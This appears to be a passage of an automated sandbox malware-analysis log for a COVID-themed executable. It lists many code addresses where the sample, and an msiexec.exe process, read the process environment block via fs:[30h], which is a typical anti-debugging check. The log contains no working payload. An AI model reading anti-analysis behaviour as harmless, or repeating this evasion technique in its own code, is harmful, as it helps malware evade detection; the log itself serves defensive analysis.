Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154B390 mov eax, dword ptr fs:[00000030h]	3_2_0154B390
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D138A mov eax, dword ptr fs:[00000030h]	3_2_015D138A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015CD380 mov ecx, dword ptr fs:[00000030h]	3_2_015CD380
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01521B8F mov eax, dword ptr fs:[00000030h]	3_2_01521B8F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01521B8F mov eax, dword ptr fs:[00000030h]	3_2_01521B8F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]	3_2_01544BAD
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]	3_2_01544BAD
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]	3_2_01544BAD
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E5BA5 mov eax, dword ptr fs:[00000030h]	3_2_015E5BA5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DEA55 mov eax, dword ptr fs:[00000030h]	3_2_015DEA55
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015A4257 mov eax, dword ptr fs:[00000030h]	3_2_015A4257
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]	3_2_01519240
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]	3_2_01519240
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]	3_2_01519240
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]	3_2_01519240
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155927A mov eax, dword ptr fs:[00000030h]	3_2_0155927A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015CB260 mov eax, dword ptr fs:[00000030h]	3_2_015CB260
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015CB260 mov eax, dword ptr fs:[00000030h]	3_2_015CB260
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8A62 mov eax, dword ptr fs:[00000030h]	3_2_015E8A62
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]	3_2_01515210
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01515210 mov ecx, dword ptr fs:[00000030h]	3_2_01515210
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]	3_2_01515210
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]	3_2_01515210
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151AA16 mov eax, dword ptr fs:[00000030h]	3_2_0151AA16
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151AA16 mov eax, dword ptr fs:[00000030h]	3_2_0151AA16
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DAA16 mov eax, dword ptr fs:[00000030h]	3_2_015DAA16
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DAA16 mov eax, dword ptr fs:[00000030h]	3_2_015DAA16
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01533A1C mov eax, dword ptr fs:[00000030h]	3_2_01533A1C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01528A0A mov eax, dword ptr fs:[00000030h]	3_2_01528A0A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01554A2C mov eax, dword ptr fs:[00000030h]	3_2_01554A2C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01554A2C mov eax, dword ptr fs:[00000030h]	3_2_01554A2C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542ACB mov eax, dword ptr fs:[00000030h]	3_2_01542ACB
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542AE4 mov eax, dword ptr fs:[00000030h]	3_2_01542AE4
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154D294 mov eax, dword ptr fs:[00000030h]	3_2_0154D294
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154D294 mov eax, dword ptr fs:[00000030h]	3_2_0154D294
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0152AAB0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0152AAB0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154FAB0 mov eax, dword ptr fs:[00000030h]	3_2_0154FAB0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]	3_2_015152A5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]	3_2_015152A5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]	3_2_015152A5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]	3_2_015152A5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]	3_2_015152A5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01537D50 mov eax, dword ptr fs:[00000030h]	3_2_01537D50
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01553D43 mov eax, dword ptr fs:[00000030h]	3_2_01553D43
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01593540 mov eax, dword ptr fs:[00000030h]	3_2_01593540
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015C3D40 mov eax, dword ptr fs:[00000030h]	3_2_015C3D40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153C577 mov eax, dword ptr fs:[00000030h]	3_2_0153C577
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153C577 mov eax, dword ptr fs:[00000030h]	3_2_0153C577
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151AD30 mov eax, dword ptr fs:[00000030h]	3_2_0151AD30
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DE539 mov eax, dword ptr fs:[00000030h]	3_2_015DE539
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]	3_2_01523D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8D34 mov eax, dword ptr fs:[00000030h]	3_2_015E8D34
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0159A537 mov eax, dword ptr fs:[00000030h]	3_2_0159A537
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]	3_2_01544D3B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]	3_2_01544D3B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]	3_2_01544D3B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]	3_2_01596DC9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015C8DF1 mov eax, dword ptr fs:[00000030h]	3_2_015C8DF1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0152D5E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0152D5E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]	3_2_015DFDE2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]	3_2_015DFDE2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]	3_2_015DFDE2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]	3_2_015DFDE2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154FD9B mov eax, dword ptr fs:[00000030h]	3_2_0154FD9B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154FD9B mov eax, dword ptr fs:[00000030h]	3_2_0154FD9B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]	3_2_01542581
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]	3_2_01542581
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]	3_2_01542581
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]	3_2_01542581
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]	3_2_01512D8A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]	3_2_01512D8A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]	3_2_01512D8A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]	3_2_01512D8A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]	3_2_01512D8A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]	3_2_01541DB5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]	3_2_01541DB5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]	3_2_01541DB5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E05AC mov eax, dword ptr fs:[00000030h]	3_2_015E05AC
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E05AC mov eax, dword ptr fs:[00000030h]	3_2_015E05AC
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015435A1 mov eax, dword ptr fs:[00000030h]	3_2_015435A1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AC450 mov eax, dword ptr fs:[00000030h]	3_2_015AC450
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AC450 mov eax, dword ptr fs:[00000030h]	3_2_015AC450
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A44B mov eax, dword ptr fs:[00000030h]	3_2_0154A44B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153746D mov eax, dword ptr fs:[00000030h]	3_2_0153746D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]	3_2_015E740D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]	3_2_015E740D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]	3_2_015E740D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]	3_2_01596C0A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]	3_2_01596C0A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]	3_2_01596C0A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]	3_2_01596C0A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]	3_2_015D1C06
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154BC2C mov eax, dword ptr fs:[00000030h]	3_2_0154BC2C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8CD6 mov eax, dword ptr fs:[00000030h]	3_2_015E8CD6
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D14FB mov eax, dword ptr fs:[00000030h]	3_2_015D14FB
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596CF0 mov eax, dword ptr fs:[00000030h]	3_2_01596CF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596CF0 mov eax, dword ptr fs:[00000030h]	3_2_01596CF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01596CF0 mov eax, dword ptr fs:[00000030h]	3_2_01596CF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152849B mov eax, dword ptr fs:[00000030h]	3_2_0152849B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152EF40 mov eax, dword ptr fs:[00000030h]	3_2_0152EF40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152FF60 mov eax, dword ptr fs:[00000030h]	3_2_0152FF60
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8F6A mov eax, dword ptr fs:[00000030h]	3_2_015E8F6A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153F716 mov eax, dword ptr fs:[00000030h]	3_2_0153F716
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AFF10 mov eax, dword ptr fs:[00000030h]	3_2_015AFF10
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AFF10 mov eax, dword ptr fs:[00000030h]	3_2_015AFF10
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E070D mov eax, dword ptr fs:[00000030h]	3_2_015E070D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E070D mov eax, dword ptr fs:[00000030h]	3_2_015E070D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A70E mov eax, dword ptr fs:[00000030h]	3_2_0154A70E
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A70E mov eax, dword ptr fs:[00000030h]	3_2_0154A70E
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154E730 mov eax, dword ptr fs:[00000030h]	3_2_0154E730
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01514F2E mov eax, dword ptr fs:[00000030h]	3_2_01514F2E
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01514F2E mov eax, dword ptr fs:[00000030h]	3_2_01514F2E
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015537F5 mov eax, dword ptr fs:[00000030h]	3_2_015537F5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01528794 mov eax, dword ptr fs:[00000030h]	3_2_01528794
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597794 mov eax, dword ptr fs:[00000030h]	3_2_01597794
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597794 mov eax, dword ptr fs:[00000030h]	3_2_01597794
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597794 mov eax, dword ptr fs:[00000030h]	3_2_01597794
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01527E41 mov eax, dword ptr fs:[00000030h]	3_2_01527E41
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DAE44 mov eax, dword ptr fs:[00000030h]	3_2_015DAE44
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DAE44 mov eax, dword ptr fs:[00000030h]	3_2_015DAE44
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153AE73 mov eax, dword ptr fs:[00000030h]	3_2_0153AE73
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153AE73 mov eax, dword ptr fs:[00000030h]	3_2_0153AE73
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153AE73 mov eax, dword ptr fs:[00000030h]	3_2_0153AE73
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153AE73 mov eax, dword ptr fs:[00000030h]	3_2_0153AE73
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153AE73 mov eax, dword ptr fs:[00000030h]	3_2_0153AE73
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152766D mov eax, dword ptr fs:[00000030h]	3_2_0152766D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A61C mov eax, dword ptr fs:[00000030h]	3_2_0154A61C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A61C mov eax, dword ptr fs:[00000030h]	3_2_0154A61C
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151C600 mov eax, dword ptr fs:[00000030h]	3_2_0151C600
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151C600 mov eax, dword ptr fs:[00000030h]	3_2_0151C600
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151C600 mov eax, dword ptr fs:[00000030h]	3_2_0151C600
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01548E00 mov eax, dword ptr fs:[00000030h]	3_2_01548E00
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1608 mov eax, dword ptr fs:[00000030h]	3_2_015D1608
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015CFE3F mov eax, dword ptr fs:[00000030h]	3_2_015CFE3F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151E620 mov eax, dword ptr fs:[00000030h]	3_2_0151E620
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8ED6 mov eax, dword ptr fs:[00000030h]	3_2_015E8ED6
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01558EC7 mov eax, dword ptr fs:[00000030h]	3_2_01558EC7
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015436CC mov eax, dword ptr fs:[00000030h]	3_2_015436CC
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015CFEC0 mov eax, dword ptr fs:[00000030h]	3_2_015CFEC0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015276E2 mov eax, dword ptr fs:[00000030h]	3_2_015276E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015416E0 mov ecx, dword ptr fs:[00000030h]	3_2_015416E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AFE87 mov eax, dword ptr fs:[00000030h]	3_2_015AFE87
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E0EA5 mov eax, dword ptr fs:[00000030h]	3_2_015E0EA5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E0EA5 mov eax, dword ptr fs:[00000030h]	3_2_015E0EA5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E0EA5 mov eax, dword ptr fs:[00000030h]	3_2_015E0EA5
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015946A7 mov eax, dword ptr fs:[00000030h]	3_2_015946A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BA44B mov eax, dword ptr fs:[00000030h]	14_2_045BA44B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461C450 mov eax, dword ptr fs:[00000030h]	14_2_0461C450
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0461C450 mov eax, dword ptr fs:[00000030h]	14_2_0461C450
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A746D mov eax, dword ptr fs:[00000030h]	14_2_045A746D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641C06 mov eax, dword ptr fs:[00000030h]	14_2_04641C06
